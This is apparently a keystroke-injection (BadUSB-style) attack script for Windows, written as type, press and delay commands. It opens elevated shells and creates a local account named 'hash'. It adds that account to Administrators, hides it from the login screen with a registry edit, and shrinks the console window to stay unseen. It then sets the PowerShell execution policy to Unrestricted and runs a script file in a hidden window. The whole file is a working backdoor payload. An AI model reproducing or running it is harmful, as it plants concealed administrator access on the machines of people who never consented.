type("powershell Start-Process notepad -Verb runAs")
press("ENTER")
delay(200  )
delay(200  )
press("ENTER")
delay(1000)
type("m ")
delay(1000)
press("DOWN")
press("ENTER")
type("Net User hash 111  /ADD ")
press("ENTER")
type("Net LocalGroup Administrators hash  /ADD  ")
delay(500)
type("reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v hash /t REG_DWORD /d 0 /f")
press("ENTER")
type("Remove-Item $MyINvocation.InvocationName ")
press("ENTER")
delay(1000)
type("C:\Windows\config-80260.ps1")
press("ENTER")
delay(1000)
delay(200  )
delay(200  )
type("powershell Start-Process cmd -Verb runAs ")
press("ENTER")
delay(200  )
delay(1000)
type("mode con:cols=14 lines=1 ")
press("ENTER")
delay(200  )
type("m ")
delay(200   )
press("ENTER")
type("powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false")
press("ENTER")
delay(200)
type("powershell.exe -windowstyle hidden -File C:\Windows\config-80260.ps1")
press("ENTER")
